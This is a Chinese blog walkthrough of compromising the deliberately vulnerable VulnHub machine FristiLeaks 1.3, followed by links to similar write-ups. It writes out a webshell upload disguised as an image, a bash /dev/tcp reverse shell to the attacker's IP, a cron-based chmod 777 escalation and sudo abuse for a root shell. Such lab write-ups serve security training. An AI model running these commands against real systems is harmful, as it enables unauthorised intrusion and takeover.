vulnhub靶机渗透 FRISTILEAKS: 1.3

最新推荐文章于 2023-10-06 16:43:50 发布
最新推荐文章于 2023-10-06 16:43:50 发布
阅读量216 收藏 1
点赞数
分类专栏: 靶机笔记 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RestoreJustice/article/details/129639236
版权

FRISTILEAKS: 1.3靶机入侵

1、环境搭建

下载地址: https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。

根据官网提供的说明,首先要将要求设置VMware虚拟机的MAC地址 08:00:27:A5:A6:76,然后开启VM

2、信息收集

  • 主机发现

    使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.110.1/24
    在这里插入图片描述

    192.168.110.130,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24

  • 端口扫描

    使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.130
    在这里插入图片描述

    仅开启了80端口

3、漏洞探测

  • 访问web端

    查看源码仅发现要求4小时拿下靶机
    在这里插入图片描述

  • 目录扫描

    使用dirsearch 对网站进行目录扫描
    在这里插入图片描述

    访问/images/文件夹找到两张图片。第一张提示说这不是我们要的url,让我们再找找

    在这里插入图片描述

    第二张图片提醒我们要保持冷静
    在这里插入图片描述

    冷静(fristi),这张图片就是首页的我们第二次看到再结合到上一张图片的提示,这张很有可能有提示。提示保持冷静,尝试拼接fristi到ur中

    成功找到登录页面
    在这里插入图片描述
    继续扫描目录fristi,没什么发现

  • 解密,获得登录密码

    查看登录网页源代码发现 eezeepz 的留言,这应该是一个账号。
    在这里插入图片描述

    在末尾发现一段base64加密的字符串
    在这里插入图片描述

    复制,写入一个文件,之后使用命令解码:

    base64 -d encode.txt

在这里插入图片描述

根据文件格式,这是一个PNG格式的图画,保存为PNG格式

使用feh decode.png打开得到:keKkeKKeKKeKkEkkEk

base64 -d encode.txt > decode.png

  • 登录后台寻找突破口

    使用找到的信息,组成下面的账号密码尝试登录

    username:eezeepz
password:keKkeKKeKKeKkEkkEk

在这里插入图片描述

成功登录,是一个文件上传功能,看能不能上传木马

  • 文件上传getshell

    提示只能上传后缀名为.png、.jpg等图片格式
    在这里插入图片描述

    在图片中插入phpinfo和一句话木马,成功上传到 /uploads目录,根据前面的目录爆破可知上传路径
    在这里插入图片描述

    访问上传的图片,发现可以解析
    在这里插入图片描述

    只用蚁剑连接,成功getshell
    在这里插入图片描述

4、权限提升

  • 反弹shell

    bash -i >& /dev/tcp/192.168.110.129/10086 0>&1

在这里插入图片描述

使用python获取交互式shell

python -c 'import pty;pty.spawn("/bin/sh")'

  • 查找文件获取信息

    尝试sudo和suid提权失败,在eezeepz家目录找到提示

在这里插入图片描述

  • 定时任务执行命令

    根据notes.txt的提示,在/tmp/runtis当中写入的命令会定时执行,那么,修改/home/admin目录的权限。

    echo '/usr/bin/../../bin/chmod -R 777 /home/admin' > /tmp/runthis

在这里插入图片描述
等待系统执行命令之后,就可以阅读 /home/admin 下的内容了

在这里插入图片描述

翻找文件找到两条加密字符串和加密程序

加密程序
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

重写解密程序即可

解密程序
import base64,codecs,sys

def decryptString(str):
    rot13str = codecs.decode(str[::-1], 'rot13')
return base64.b64decode(rot13str)

print decryptString(sys.argv[1])

加密程序和解密程序都是使用python2的语法来写,运行的时候要注意。改为python3格式会出现下面的问题
在这里插入图片描述

解密得到

mVGZ3O3omkJLmy2pcuTq  :thisisalsopw123
=RFn0AKnlMHMPIzpyuTI0ITG :LetThereBeFristi!

这有可能是用户fristigod或者admin 的密码,组合试试

在这里插入图片描述
在这里插入图片描述
成功登录到fristigod用户

查看命令使用记录,history命令执行结果:
在这里插入图片描述
可以看到fristigod用户一直sudo来执行命令.发现一个doCom二进制文件具有root执行权.。利用它成功提权

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9PATBuGt-1679129066798)(img/image-20230112000417666.png)]

还可以使用sudo提升权限,并创建一个shell

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

直sudo来执行命令.发现一个doCom二进制文件具有root执行权.。利用它成功提权
在这里插入图片描述

还可以使用sudo提升权限,并创建一个shell

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
不要温顺地走进那个良夜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub】---FristiLeaks_1.3靶机
qq_43168364的博客
08-22 848
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机FristiLeaks: 1.3靶机(192.168.15.155) 攻击机:kali Linux(192.168.15.129) 相关设置 根据官网的提示这里需要给靶机设置MAC地址 设置好了之后就可以开心的玩耍了。 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub-FRISTILEAKS 1.3
热门推荐
江左盟的博客
12-02 1万+
简介 这是一台CTF类的靶机,比较考验脑洞,我个人不大喜欢,能想到作者的设计的点会觉得简单,想不到就觉得难。该靶机通过网页源码获取登录用户名和密码,然后利用Apache解析漏洞获取服务器权限,可利用脏牛直接提升至root用户权限,也可利用计划任务先获取admin用户权限,然后解密密文获得fristigod用户登录密码,最后利用SUID程序提升至root权限。 靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 信息收集 使用nmap --min-
vulnhub渗透系列之FristiLeaks: 1.3
来到了学渣的博客
02-06 2078
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.该靶机安装好后自动提示了IP地址,所以直接探测存活的端口就行,发现与以往不一样的是它只开放了80端口,nmap同时也扫出来cola/sisi/beer三个目录。 2.进入80端web页面,登录到cola/sisi/beer发现图片提示主要...
FristiLeaks_1.3
cxyzupup的博客
01-10 493
FristiLeaks_1.3 项目地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 提示: (1)靶机网络连接方式使用NAT模式 (2)该靶机做了地址绑定,因此需要设置固定物理地址才能获取IP地址;物理地址为:08:00:27:A5:A6:76 文章目录FristiLeaks_1.3一、信息收集1. 使用nmap收集端口服务信息:2. 查看tcp80端口:3. 使用gobuster工具对http服务进行枚举:3.1 查看/images目录:3.2 查
Vulnhub-靶机-FristiLeaks 1.3
qq_43264813的博客
03-01 355
Vulnhub靶机FristiLeaks 1.3 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub靶机FristiLeaks 1.3一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址,对目标靶机进行全端口扫描: 【命令】nmap -n -p- 192.168
5.100个渗透测试实战#5(FristiLeaks_1.3
qwsn
03-25 2415
目录 一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现 1.查看kali的网卡和IP信息(网卡名:eth0,IP:192.168.97.129); 2.查看靶机页面; 3.探测特定网络内的主机存活状态(netdiscover、arp-scan、nmap); 4.分析所得; (二)信息收集——端口(服务)扫描; 1.扫描端口,以及端口对应的服务,以及靶机的运行...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
靶机渗透FristiLeaks1.3 ☀️新手详细☀️
君莫hacker的博客
09-08 7050
靶机FristiLeaks1.3的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/fristileaks-13,133/ 作者 Ar0xA 发布日期 2015年12月14日 难度 中等 靶机基本介绍: 一个小型虚拟机是为一个叫做Fristileaks的荷兰非正式黑客聚会而设计的。意味着可以在几个小时内完成,
【甄选靶场】Vulnhub百个项目渗透——项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取)
人间体佐菲的博客
09-18 707
网络安全,基础,靶场,信息安全渗透测试,红队
靶机FristiLeaks_1.3
AzVoidSUN的博客
05-10 857
下载连接 https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent https://download.vulnhub.com/fristilea ks/FristiLeaks_1.3.ova 运行环境 Virtualbox (二选一) Vnware Workstation player VMware用户将需要手动将VM...
Vulnhub系列:FristLeaks
Ays.Ie的博客
03-09 565
Vulnhub系列:FristiLeaks
Vulnhub靶机渗透FRISTILEAKS: 1.3
Mysmycbx的博客
05-27 2019
信息收集很难,需要总结
kali渗透综合靶机(六)--FristiLeaks靶机
W小哥
03-11 1416
一、靶机下载 下载链接:https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova 二、FristiLeaks靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.27.128 靶机IP:192.1...
FRISTILEAKS: 1.3 渗透测试靶场
shulao2010的博客
05-28 217
一个有趣的靶场,感受如何一点点根据作者提示拿到root权限的乐趣
OSCP推荐靶场-FristiLeaks
最新发布
qq_63785498的博客
10-06 413
SetUID(Set User ID)是一种特殊的权限,它允许一个程序在执行时以文件所有者的身份运行,而不是执行者的身份。这样做的效果是,命令的标准输入会与网络套接字的输出连接,从而允许远程计算机发送命令到被攻击者的计算机。: 这个选项指定了发送扫描请求的最小速率,即在扫描中发送数据包的最小速度。: 这是一个I/O重定向操作符,它将一个文件描述符(在这里是标准输出)连接到另一个文件描述符。: 这是Shell程序的名称,它会启动一个新的Shell会话。: 这是Linux系统上的一个用于查找文件和目录的命令。
vulnhub靶机——raven: 2
09-03
- *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值